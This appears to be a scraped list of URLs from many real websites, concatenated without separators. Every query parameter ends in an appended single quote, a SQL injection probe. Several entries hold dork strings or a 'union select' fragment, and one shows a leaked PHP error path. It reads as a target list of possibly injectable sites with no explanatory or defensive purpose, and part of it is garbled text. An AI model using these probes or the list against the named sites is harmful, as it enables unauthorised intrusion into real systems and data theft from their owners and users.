dakamericas.com/newsdetail.php?id='30http://www.leadacidbatteryinfo.org/newsdetail.php?id='22http://www.edlconsulting.com/newsdetail.php?headline='Google_announces_cloud_computing_operating_system_will_be_completely_open_source&id='531http://www.j-diocese.org/newsdetail.php?id='34http://www.rspba.org/html/newsdetail.php?id='57http://www.samuseum.org/about/newsdetail.php?id='34http://www.edlconsulting.com/newsdetail.php?id='634&headline='E-commerce_relevance_of_Apple_iPad_has_yet_to_be_realizedhttp://www.bscc.edu/newsdetail.php?ID='428http://www.rockportartcenter.com/news/newsdetail.php?id='17http://www.kadamenviro.com/newsdetail.php?id='48&start='0http://www.allanhouser.com/newsDetail.php?id='21http://www.prater.at/NewsDetail.php?Id='1008734http://www.mcny.edu/news/newsdetail.php?id='389http://www.bscc.edu/newsdetail.php?ID='429http://www.georgiaquickstart.org/newsDetail.php?id='3460158f92b1463c8307327fa910af33&600&600http://www.prater.at/NewsDetail.php?Id='1593281http://www.qatar-conferences.org/arab/newsdetail.php?id='3" dir='rtl class='l onmousedown='"return clk(this.href,'','','','91','','0CBUQFjAAOFo')">ندوة دولة السلطة وسلطة الدولةالإمبراطور البرازيلي ادريانو رسمياً مع روما ودي روسي ينÙÙŠ رحيله http://www.koreasarang.com/readnews.php?id='991http://www.hcpoa.com/readnews.php?id='163http://
www.blamm.com/top10.php?id='8http://housemouseantics.com/php/top10.php?what='14021http://www.zubial.fr/top10.php?lang2='2http://www.persianawards.com/awards-top10.php?award='Music&cat='Poet%20and%20Lyricshttp://www.zubial.pt/top10.php?lang2='2http://housemouseantics.com/php/top10.php?what='14075http://www.persianawards.com/awards-top10.php?award='Literature&cat='Fictionhttp://www.poblanerias.com/clasificados/clasificados-top10.php?cat='5http://www.kamera-digital.com/artikel/top10.php?ArtID='2http://www.diamondmailer.de/top10.php?ref='daredevil13http://www.goldensword.net/historialeer.php?num='44http://www.goldensword.net/historialeer.php?num='22http://www.ruedelimmobilier.com/reagir.php?article='1789http://www.istnf.fr/site/minisite/reagir.php?numsite='23&page='94&fiche='4367http://www.gwelan.net/fcj/news/reagir.php?newsID='13http://gwelan.info/fcj/news/reagir.php?newsID='49http://www.istnf.fr/site/Themes/reagir.php?fiche='3796http://www.gwelan.fr/fcj/news/reagir.php?newsID='36http://gwelan.info/fcj/news/reagir.php?newsID='35http://www.bdtheque.com/forum_bds.php?subjectid='33121&num='1http://www.enghiong.com/library/forum_bds+php%27inurlcar+sport%27+and+0='1+union+selecthttp://www.biclopsgames.com/game.php?id='1http://www.splashworks.com/game.php?id='49http://www.allgame.com/game.php?id='73257http://www.operationsports.com/game.php?id='670http://www.operationsports.com/game.php?id='665http://www.yougame.com/game.php?id='5392http://www.tabloidgames.com/game.php?id='9http://www.gamesinaflash.com/game.php?id='35http://www.codeglue.com/game.php?id='1http://percypea.co.uk/game.php?id='3d%20buggy%20racing&type='featuredhttp://www.mappn.com/game.php?id='9http://www.allgame.com/game.php?id='11686http://www.brainmelt.com/game.php?id='8http://www.gamesinaflash.com/game.php?id='48http://www.mappn.com/game.php?id='11http://www.dosgraveyard.com/game.php?id='108http://www.vizzed.com/vizzedboard/retro/game.php?id='2405http://www.bratzgamestoplay.info/games/game.php?id='21http://ww
w.chrisandsam.com/games/game.php?id='406http://www.tru3d.com/products/view_product.php?id='30389http://www.accutronics.co.uk/pages/view_product.php?id='4http://www.kidsarefunk.com/view_product.php?id='53http://www.liquidlines.co.uk/view_product.php?c_id='5&sc_id='34&p_id='2023&PHPSESSID='24353b6ce50e3eb28de493fb...http://www.precisionbiologic.com/products/view_product.php?id='20http://handybg.com/view_product.php?id='771http://www.handy.rs/en/view_product.php?id='1865http://ct-srv3.aegean.gr/aggelopoulos/newsone.php?id='Mjk='&lng='Z3JlZWs='http://gulfbusinessinformation.com/view_product.php?id='27http://www.hotfile123.com/index.php?q='datedick+com+news+newsone+php+id+and+1+2+and+user+0http://www.pt.ncku.edu.tw/newsone.php?newSno='36http://www.theoangelopoulos.gr/newsone.php?id='Mjg='&lng='ZW5nbGlzaA='='http://www.hotfile123.com/index.php?q='datedick+com+news+newsone+php+id+and+1+2http://www.barracuda.gr/newsone.php?id='35http://www.theoangelopoulos.gr/newsone.php?id='NDU='&lng='Z3JlZWs='http://www.archdioceseofcolombo.com/news.php?id='851http://eggblog.net/news.php?id='39http://www.indiepubgames.com/news.php?id='2http://www.itmaasia.com/news.php?id='1http://www.sotatoys.com/news.php?id='51http://www.sinatrafamily.com/news/news.php?id='0http://www.flipskateboards.com/news.php?id='175http://www.cloudveil.com/company/news.php?id='63http://www.fourcty.org/news.php?id='39&p='7http://www.anope.org/news.php?id='57http://en.apa.az/news.php?id='122212http://www.rhinossoccer.com/news.php?id='1233http://newsrod.com/avd_start.php?avd='-2http://www.worldmusicinstitute.org/event.php?id='906http://www.forumforhinduawakening.org/events/event.php?id='81http://www.wordtheatre.com/events/event.php?id='115http://www.hertsshow.com/event.php?id='19&page='showgroundeventshttp://www.indiajournal.com/pages/event.php?id='11753http://www.globalalliancepr.org/event.php?id='8http://www.polkatheatre.com/event.php?id='1http://www.visitogunquit.org/event.php?id='21http://www.musikcafeen.dk/event.p
hp?id='930&e='PROTOTYBE:%20NEIL%20LANDSTRUMM%20(PLANET%20MU/UK)%20+%20DJ%20J%27ESP%C3%89RE%20+%20PROTOTYBE%20DJ%27Shttp://www.springfieldpccc.com/event.php?id='224http://www.worldmusicinstitute.org/event.php?id='466http://www.kkfi.org/event.php?id='815http://www.wordtheatre.com/events/event.php?id='122http://www.visitogunquit.org/event.php?id='20http://www.musikcafeen.dk/event.php?id='937http://www.nscurl.com/portal/event.php?id='1http://www.kkfi.org/event.php?id='870http://www.polkatheatre.com/event.php?id='25http://www.artsadmin.co.uk/events/event.php?id='512http://www.thelizardlounge.com/event.php?id='1446http://www.hotfile123.com/index.php?q='dirthy+product+item+php+id+and+user+0+and+user+0+product+item+php+idhttp://www.iesaa.com/root/Product-Item.php?id='6416&catid='276http://www.iesaa.com/root/Product-Item.php?id='6338http://www.schmittspiele.de/spiele/sql.php?id='30http://www.odesk.com/users/ASP-Net-SQL-PHP-SQL-Developer-Team-Leader_~~4c4d651209aa000a?sid='12001http://www.odesk.com/users/UJHAA-Services-ASP-Net-SQL-PHP-MySQL-Data-Entry_~~ae5c9677b99dcb88?sid='48002&recent='no&tot='5984&pos='4995http://newsrod.com/sql.php?id='1%27http://www.mairie-tierce.fr/index2.php?srubrique='%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20index:%20%20Champs%20in%20%3Cb%3E/var/www/vhosts/mairie-tierce.fr/httpdocs/lib/base/SQL.php%3C/b%3E%20on%20line%20%3Cb%3E150%3C/b%3E%3Cbr%20/%3E%3Cbr%20http://www.ufwda.org/news_view.php?id='165http://www.mondopop.it/news_view.php?id='38http://www.citcochandigarh.com/news_view.php?id='4http://www.dbxpro.com/news_view.php?id='25http://www.comprousa.com/en/news_view.php?id='8http://www.ufwda.org/news_view.php?id='175http://www.paintballxxl.com/news_view.php?id='1348http://ccet.nctu.edu.tw/news_view.php?id='43http://www.sjzbus.com.cn/news_view.php?id='356&cateid='16http://www.jfsmithassociates.com/news_view.php?id='10http://ccet.nctu.edu.tw/news_view.php?id='45http://www.5hchina.com/news_view.php?id='6703http://www.motortribe.it/speedday/
news_view.php?ID='43http://www.samick.co.kr/eng/news/news_view.php?code='news&id='30http://www.eggheadcafe.com/searchform.aspx?search='id+identify+user+user+identify+sql+php+how+http://www.cectelecom.com/en/news/news_view.php?id='439http://www.motortribe.it/news_view.php?ID='3868http://www.tamtammilano.it/portal/news_view.php?ID='10568http://www.chinalegends.com/news_view.php?id='107http://www.farmer.bg/news_view.php?id='22051http://www.saosaosao.com/news_view.php?id='47http://www.lebanque.it/news_view.php?ID='25http://biblioteca-ua.com/select_biblio.php?id='1599http://kupa.pl/pl/humor.php?id='16http://www.litoralmania.com.br/humor.php?id='49http://www.gbritain.net/humor.php?id='2http://www.estaentodo.com/humor/humor.php?id='578&numero='10http://forum.ms.agh.edu.pl/humor.php?kat='3&metoda='czas&kolejnosc='DESChttp://www.otnako.supik.info/humor.php?id='30http://forum.ms.agh.edu.pl/humor.php?id='259http://www.saberdetudo.com.br/humor.php?id='480http://www.estaentodo.com/humor/humor.php?id='582&numero='7http://www.ginnyblack.yoyo.pl/humor.php?id='1http://infokorupsi.com/id/humor.php?ac='4&l='mantra-sakti-ajian-untuk-korupsihttp://www.climb.com.ua/aboutbook.php?id='12http://familynewsabout.com/aboutBook.php?id='3241http://www.partenaire-plus.com/fiche_spectacle.php?cat='spectacle&idcat='1&id='20http://www.frontnational.com/communique_detail.php?id='1956http://www.fn-franchecomte.com/communique_detail.php?id='100http://www.fn-languedocroussillon.com/communique_detail.php?id='122http://www.echtenamen.de/kategorie.php4?id='3http://www.suchbiene.de/kategorie.php4?id='1199http://www.suchbiene.de/kategorie.php4?id='870http://www.php-crawler.de/befehle/kategorie.php4?kategorie='Sessionshttp://www.torry.net/news.php?id='26http://www.bigdance2010.com/news.php?id='94http://www.aoecs.org/news/news.php?id='52
